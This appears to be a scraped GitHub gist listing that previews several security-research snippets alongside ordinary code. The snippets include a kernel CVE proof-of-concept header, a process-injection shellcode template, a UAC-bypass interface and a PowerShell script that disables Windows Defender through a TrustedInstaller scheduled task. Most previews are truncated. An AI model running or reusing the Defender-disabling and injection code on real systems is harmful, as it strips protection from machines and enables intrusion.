Lays L4ys

@andshrew
andshrew / README.md
Last active December 3, 2024 10:57
VMware Workstation VM encryption passwords saved in the Windows Credential Manager

Retrieving VMware Workstation VM encryption passwords saved in the Windows Credential Manager

When creating an encrypted VM, VMware Workstation gives you the option to remember the password. It does this by storing the password in the Windows Credential Manager.

VMware does not provide a way to retrieve this stored password, but it can be accessed via the Win32 CredReadW API function.

There are a number of PowerShell projects including PowerShell Credential Manager which provide access to this API, but in testing I found they were unable to correctly display the VMware password.

This PowerShell example has been tested using Windows PowerShell (v5.1) and PowerShell (v7) using VMwa

@jakeajames
jakeajames / poc.c
Last active May 1, 2023 19:58
CVE-2021-30955 PoC
#include <stdlib.h>
#include <stdio.h>
#include <pthread/pthread.h>
#include <mach/mach.h>
struct ool_msg {
mach_msg_header_t hdr;
mach_msg_body_t body;
mach_msg_ool_ports_descriptor_t ool_ports[];
};
curl http://api.mainnet-beta.solana.com -X POST -H "Content-Type: application/json" -d '{
"jsonrpc": "2.0",
"id": 1,
"method": "getProgramAccounts",
"params": [
"cndyAnrLdpjq1Ssp1z8xxDsB8dxe7u4HL5Nxi2K5WXZ",
{
"encoding": "jsonParsed",
"filters": [ ]
}
@NtRaiseHardError
NtRaiseHardError / imagine-needing-writeprocessmemory-and-createremotethread.c
Last active November 8, 2024 23:03
Process injection without WriteProcessMemory or CreateRemoteThread/QueueUserApc
#include <Windows.h>
// example shellcode
// make sure to have 8 reserved bytes for 64-bit ret
// gadget to rop into the actual shellcode
CHAR shellcode[] = {
// 8 bytes here for jmp loop gadget
0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA,
// actual shellcode starts here
0xEB, 0xFE, 0x01, 0x23, 0x45, 0x67, 0x89, 0xAA,
@tyranid
tyranid / doh.ps1
Created May 4, 2020 15:17
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@Merott
Merott / tailwind-colors-as-css-variables.md
Last active November 12, 2024 12:19
Expose Tailwind colors as CSS custom properties (variables)

This is a simple Tailwind plugin to expose all of Tailwind's colors, including any custom ones, as custom css properties on the :root element.

There are a couple of main reasons this is helpful:

  • You can reference all of Tailwind's colors—including any custom ones you define—from handwritten CSS code.
  • You can define all of your colors within the Tailwind configuration, and access the final values programmatically, which isn't possible if you did it the other way around: referencing custom CSS variables (defined in CSS code) from your Tailwind config.

See the Tailwind Plugins for more info on plugins.

@WanderingGlitch
WanderingGlitch / ida2to3.py
Created November 12, 2019 01:30
IDA 2to3 fixers to help move from the newer APIs
#!/usr/bin/env python
'''
This has some pretty gross hacks in it
But gives a general idea what it is like to write a 2to3 fixer
Basically run like this:
ida2to3.py /path/to/your/script /path/to/idc_bc695.py
Give it a once over to make sure it didn't break too much, then:
@hfiref0x
hfiref0x / akagi_58a.c
Created October 23, 2019 16:27
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
@darconeous
darconeous / tesla-key-card-protocol.md
Last active December 6, 2024 00:17
Tesla Key Card Protocol

Tesla Key Card Protocol

Researched by Robert Quattlebaum darco@deepdarc.com.

Last updated 2020-02-03.


@gamozolabs
gamozolabs / coverage.rs
Created April 19, 2019 21:56
Compare coverage implementation in the old Vectorized Emulator
/// Generate a hash using the values in Zmm0 and return Zmm0
///
/// Clobbers Zmm1!!!
fn hash_zmm0(outasm: &mut falkasm::AsmStream, conststore: &mut ConstStore)
{
let kmask = Operand::KmaskRegister(KmaskType::Merge(KmaskReg::K1));
let thirt = Membc(Some(R10), None, conststore.add_const(13)
.unwind("Out of room for constant storage") as i64 * 4);
let sevent = Membc(Some(R10), None, conststore.add_const(17)